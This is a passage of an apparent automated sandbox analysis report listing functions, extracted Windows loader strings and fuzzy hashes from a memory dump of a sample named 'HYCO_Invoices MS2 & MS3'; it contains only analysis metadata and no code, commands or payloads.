                                                                                                                                        Function 010AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • @, xrefs: 010AC1F1
                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010AC1C5
                                                                                                                                        • PreferredUILanguages, xrefs: 010AC212
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                        • API String ID: 0-2968386058
                                                                                                                                        • Opcode ID: 32b2f0687e20e4f67aa82fe87247cef5c7d9a82a8478ce8a8576d3dc5e8a880b
                                                                                                                                        • Instruction ID: dce03a1cc3356a32f3460ef7b0d70b9759fc23edd41c491342f5688a13d9d8a6
                                                                                                                                        • Opcode Fuzzy Hash: 32b2f0687e20e4f67aa82fe87247cef5c7d9a82a8478ce8a8576d3dc5e8a880b
                                                                                                                                        • Instruction Fuzzy Hash: C6418271E00209EBEF15DAD8C941FEEBBF8AB54700F45406AE649F7280D7749E448B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01084144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                        • API String ID: 0-1373925480
                                                                                                                                        • Opcode ID: 3d4e45c6d8274781837a5d708d8b338b3d51bc91eb9c351c8e1478cf33ee3421
                                                                                                                                        • Instruction ID: f6bfe605b454c3ecb8833e067d6adae6825c148b4dffe4a41d6db990254fcdd4
                                                                                                                                        • Opcode Fuzzy Hash: 3d4e45c6d8274781837a5d708d8b338b3d51bc91eb9c351c8e1478cf33ee3421
                                                                                                                                        • Instruction Fuzzy Hash: 5841F431A0865A8FEB22EBA9C840BADBBF5FF65340F14049AD9C1EF791D7348901CB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01074755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrpCheckRedirection, xrefs: 0107488F
                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01074888
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01074899
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                        • Opcode ID: e40cd4516c127e290993fb123b08f4a5088256dc3360a9270913629c1250db95
                                                                                                                                        • Instruction ID: b74fe56dca27efea0a70072d9f22c8b21c83b1c838bc352582abb96171bf7bd7
                                                                                                                                        • Opcode Fuzzy Hash: e40cd4516c127e290993fb123b08f4a5088256dc3360a9270913629c1250db95
                                                                                                                                        • Instruction Fuzzy Hash: D241CF72F042958BCBA1CE6DD840A6ABBE4BF49A50F050599EDD8DB251D331D800CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01000BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-2558761708
                                                                                                                                        • Opcode ID: a9f25754f0856ff5b543b194018b9e9ad87ca4989007de85d46d6eed40a39b40
                                                                                                                                        • Instruction ID: 967f14f6e735b888681bf685519528caa93594748e2ba6cc410efb1edf09db48
                                                                                                                                        • Opcode Fuzzy Hash: a9f25754f0856ff5b543b194018b9e9ad87ca4989007de85d46d6eed40a39b40
                                                                                                                                        • Instruction Fuzzy Hash: 831105303155428FEB5ADA18CC41BBBB7E4EF40B59F148069F885CB296DB34E840CB41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01072104
                                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 010720F3
                                                                                                                                        • LdrpInitializationFailure, xrefs: 010720FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2986994758
                                                                                                                                        • Opcode ID: c28bcabed277c870f62cf5601ad24beefc6ae364ded2f92a23aa6b5e6ab45e12
                                                                                                                                        • Instruction ID: 512e05df09bc9aa571ba683a3545ccfcd6894d6ce87c43efc6e0c4228645ceeb
                                                                                                                                        • Opcode Fuzzy Hash: c28bcabed277c870f62cf5601ad24beefc6ae364ded2f92a23aa6b5e6ab45e12
                                                                                                                                        • Instruction Fuzzy Hash: F9F02834A403087BE720D60CEC12FD97BA8FB50B44F14009AF7C06B281D1B0A500D686
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: #%u
                                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                                        • Opcode ID: b5aa475fbc253b2dfb36db63600029ad7645965a5cb19f3240abbfdd3cac247b
                                                                                                                                        • Instruction ID: 522f0b06ff6029b24de8d039b73c53c29694ec5e24a6ee5f853ed1f377de8035
                                                                                                                                        • Opcode Fuzzy Hash: b5aa475fbc253b2dfb36db63600029ad7645965a5cb19f3240abbfdd3cac247b
                                                                                                                                        • Instruction Fuzzy Hash: 7D717E71A0014A9FDB42DFA8C980BEEB7F8FF58344F154065E944EB291EA34ED41CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FFA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrResSearchResource Enter, xrefs: 00FFAA13
                                                                                                                                        • LdrResSearchResource Exit, xrefs: 00FFAA25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                        • API String ID: 0-4066393604
                                                                                                                                        • Opcode ID: 3dad9340622f3472ea935dea7defbf5d86c2d04076de3ec893c144e5313eaf0b
                                                                                                                                        • Instruction ID: 8a694ce17c4c8ab89d3dbea2dfb003ba156fb3948bbc09653134627a42a0cddd
                                                                                                                                        • Opcode Fuzzy Hash: 3dad9340622f3472ea935dea7defbf5d86c2d04076de3ec893c144e5313eaf0b
                                                                                                                                        • Instruction Fuzzy Hash: 5DE19EB1E04209DBEB62DB99C980BBEB7B9BF44350F104066EE45EB261D7789840EB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: `$`
                                                                                                                                        • API String ID: 0-197956300
                                                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                        • Instruction ID: 42fc5cce14dc88c1855055d5d59fb909d825ae87b2dde6d059053c20a2b52eb9
                                                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                        • Instruction Fuzzy Hash: BFC1BE713043469BEB25CE28C881BABBBE5BFD8318F084A2DF6D68B290D775D505CB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0106E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                        • Opcode ID: 522b5f9b6685e94dbed5d2abac10ba37361ddd4d0d4fe3f9022c024b83e5cebc
                                                                                                                                        • Instruction ID: 6ae5e60ff48729cd6321eaa400a15b14f10d7223471377823c9aec1c9b2fa0b7
                                                                                                                                        • Opcode Fuzzy Hash: 522b5f9b6685e94dbed5d2abac10ba37361ddd4d0d4fe3f9022c024b83e5cebc
                                                                                                                                        • Instruction Fuzzy Hash: 55613B75E007199FDB15DFA8C940BADBBB9FF48700F24406DE689EB291D735A900CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FFAC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrpResGetMappingSize Enter, xrefs: 00FFAC6A
                                                                                                                                        • LdrpResGetMappingSize Exit, xrefs: 00FFAC7C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                                                        • API String ID: 0-1497657909
                                                                                                                                        • Opcode ID: f1018d60bbbccbd603f33a99c3d28a778a7d18e033479ce5d11ab96227f1cf1d
                                                                                                                                        • Instruction ID: 392ebaca77accd7543e48a366105b644de5fcfd608e6fbcfa50e04e447d43a86
                                                                                                                                        • Opcode Fuzzy Hash: f1018d60bbbccbd603f33a99c3d28a778a7d18e033479ce5d11ab96227f1cf1d
                                                                                                                                        • Instruction Fuzzy Hash: DD6124B2A00649DFEB11CFA8C880BAEB7B4FF14790F144169EA45EB7A0D774D940D721
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$MUI
                                                                                                                                        • API String ID: 0-17815947
                                                                                                                                        • Opcode ID: e4792e9afd5bf35d4513f3723b44e05d7090d6ddeee02bd99bf4d363e28736e3
                                                                                                                                        • Instruction ID: 8987a8fc4bdf774458df3686ec20d2d53adc93b3d38b5d4bb483ea1afe9de217
                                                                                                                                        • Opcode Fuzzy Hash: e4792e9afd5bf35d4513f3723b44e05d7090d6ddeee02bd99bf4d363e28736e3
                                                                                                                                        • Instruction Fuzzy Hash: CF515771E0061DAEDF11DFE9CD90AEEBBBCAB44754F000129E650E7291D7309906DB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • kLsE, xrefs: 00FF0540
                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FF063D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                        • Opcode ID: d3f61f4ff4314320fd93879ba89087ffe544c4e88f5cfe6be286a3d870f013a9
                                                                                                                                        • Instruction ID: d84e8bd88c9bb82687d4c76d44ef0a84c83d96e03143eb9f0f6b059cbaa2c3e0
                                                                                                                                        • Opcode Fuzzy Hash: d3f61f4ff4314320fd93879ba89087ffe544c4e88f5cfe6be286a3d870f013a9
                                                                                                                                        • Instruction Fuzzy Hash: 4F51BF7190474A8BC724EF64C5406B3B7E4AF88714F04483EEAD9C7262EB74E945DF92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FFA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 00FFA309
                                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 00FFA2FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                        • API String ID: 0-2876891731
                                                                                                                                        • Opcode ID: 9f7bc2dee9116f67053bf4cc3c62829b912679e779ecbe8b2b186871fb9eb5d3
                                                                                                                                        • Instruction ID: 25d55dd85a98c1dbc4229f813c46c190b67dd494414b1fc0c179d9890d4efc81
                                                                                                                                        • Opcode Fuzzy Hash: 9f7bc2dee9116f67053bf4cc3c62829b912679e779ecbe8b2b186871fb9eb5d3
                                                                                                                                        • Instruction Fuzzy Hash: 7941CD75A00649CBEB22DF59C840BBA77F4FF84710F2440A9EE48DB2A1E776D940DB41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                        • Opcode ID: cc6afd39bbdf29c22879c66f87ae9a6ce170acb262eacfda791fd728bd32889d
                                                                                                                                        • Instruction ID: a9843344fa3548d3cd074a813b56a0d4ecbe5526531fb9fafa9a451bfa003446
                                                                                                                                        • Opcode Fuzzy Hash: cc6afd39bbdf29c22879c66f87ae9a6ce170acb262eacfda791fd728bd32889d
                                                                                                                                        • Instruction Fuzzy Hash: B701D1B2250700EFD321DF14DE4AF1677E8E798B15F008979E698CB990EB35E804DB46
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FFC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: MUI
                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                        • Opcode ID: 14846abfe1460617e7c34738303d5ae697d37e652447ccfb70e3dc5d177514f3
                                                                                                                                        • Instruction ID: c1ba2022031d0a165b8b63d9feb72dc75f6d793730c0e4301785be29ff3e6293
                                                                                                                                        • Opcode Fuzzy Hash: 14846abfe1460617e7c34738303d5ae697d37e652447ccfb70e3dc5d177514f3
                                                                                                                                        • Instruction Fuzzy Hash: A9825C75E0022D8BDB24CFA9C9807FDB7B6BF44710F148169EA59AB3A0D7349D41EB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01076420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                        • Opcode ID: e969ff71717e7897e69f5a86a64e99d06b07a69dee113d6b877e27f8cf3b42e3
                                                                                                                                        • Instruction ID: 5e7b9d5d85ee496961cc7b2d2c7e7d993d3eeee87a4f83a05102ef5818bec7f1
                                                                                                                                        • Opcode Fuzzy Hash: e969ff71717e7897e69f5a86a64e99d06b07a69dee113d6b877e27f8cf3b42e3
                                                                                                                                        • Instruction Fuzzy Hash: AD919F72A00619AFEB21DF95CC85FEEBBB8EF08B50F104065F641AB190D775AD04CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: GlobalTags
                                                                                                                                        • API String ID: 0-1106856819
                                                                                                                                        • Opcode ID: 62492b85984f6582fbbccf1d43236352f3e5afb54068563ea5e73afbd66ab047
                                                                                                                                        • Instruction ID: 5b1ba233754e04f5a1a5a995f8f3835e3d872b55b314d96e927e765cc3a47a49
                                                                                                                                        • Opcode Fuzzy Hash: 62492b85984f6582fbbccf1d43236352f3e5afb54068563ea5e73afbd66ab047
                                                                                                                                        • Instruction Fuzzy Hash: 63719DB5E0021ACFDF68CFACD4906EDBBF5BF58700F14816AE485AB241EB369901CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01094978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .mui
                                                                                                                                        • API String ID: 0-1199573805
                                                                                                                                        • Opcode ID: 52066ccebd0d0078a7ccd1cf2df30c962503ef19595e8d13fe86db45dc99123c
                                                                                                                                        • Instruction ID: a812d2881e2681c58a498ce33027874891b290a49b81b9101f633faf1a8c89f0
                                                                                                                                        • Opcode Fuzzy Hash: 52066ccebd0d0078a7ccd1cf2df30c962503ef19595e8d13fe86db45dc99123c
                                                                                                                                        • Instruction Fuzzy Hash: EC51B872D002299BDF15DF99C950AEEBBB4AF09B10F054169FA91FB350D3789C02DBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0100E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: EXT-
                                                                                                                                        • API String ID: 0-1948896318
                                                                                                                                        • Opcode ID: 9a326a4cdfa3048626250ab03a9b4cd314e40d8ab48018c621c4716327bfd9ac
                                                                                                                                        • Instruction ID: 5e60ede98ebb795da0d3fd7889356b1287ee37b0026fc883bbddaf43c4e260d3
                                                                                                                                        • Opcode Fuzzy Hash: 9a326a4cdfa3048626250ab03a9b4cd314e40d8ab48018c621c4716327bfd9ac
                                                                                                                                        • Instruction Fuzzy Hash: A8416E725083429BE722DA65C944BABB7E8BF88714F440D6DFAC8E71C0EB74D9048796
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0106C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: BinaryHash
                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                        • Opcode ID: 2b33ff45d829052df6bc1dfe0a93fff62e5d102c0965df8d597d4fb35dc61aee
                                                                                                                                        • Instruction ID: 203648721b28652ccd589d16b477cf6bb9c8569b364f39e0f6df011630428fc0
                                                                                                                                        • Opcode Fuzzy Hash: 2b33ff45d829052df6bc1dfe0a93fff62e5d102c0965df8d597d4fb35dc61aee
                                                                                                                                        • Instruction Fuzzy Hash: BA4123B1D0052DAFEB21DB60CD84FDEB77CAB55714F0045E5EA88AB140DB709E898FA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01086B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #
                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                        • Opcode ID: c0520a67ef595d830cf1344ba86bf440d15b718c15bece2d004970336332258d
                                                                                                                                        • Instruction ID: 8284159538da758add44221a10775049c505304250c22cd303dcc6d2da7be298
                                                                                                                                        • Opcode Fuzzy Hash: c0520a67ef595d830cf1344ba86bf440d15b718c15bece2d004970336332258d
                                                                                                                                        • Instruction Fuzzy Hash: 44311A31A0471D9AEB22EB69C854BFE7BE8EF44704F154069E9C19B281C777E805CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0106CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: BinaryName
                                                                                                                                        • API String ID: 0-215506332
                                                                                                                                        • Opcode ID: ff0c7c3552ebab7d11d5a9dc4e53ba4cc4198806b6b66d3756f9722a1e0b3ddb
                                                                                                                                        • Instruction ID: cc01134a9aaea1e062b0caa290d199dab385e6445ca84630b8e8a1e90ed3f095
                                                                                                                                        • Opcode Fuzzy Hash: ff0c7c3552ebab7d11d5a9dc4e53ba4cc4198806b6b66d3756f9722a1e0b3ddb
                                                                                                                                        • Instruction Fuzzy Hash: D8313936900519AFFB16DB58CA45EBFBBB8EF80710F014169E985A7250D730DE00DBE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0107895E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
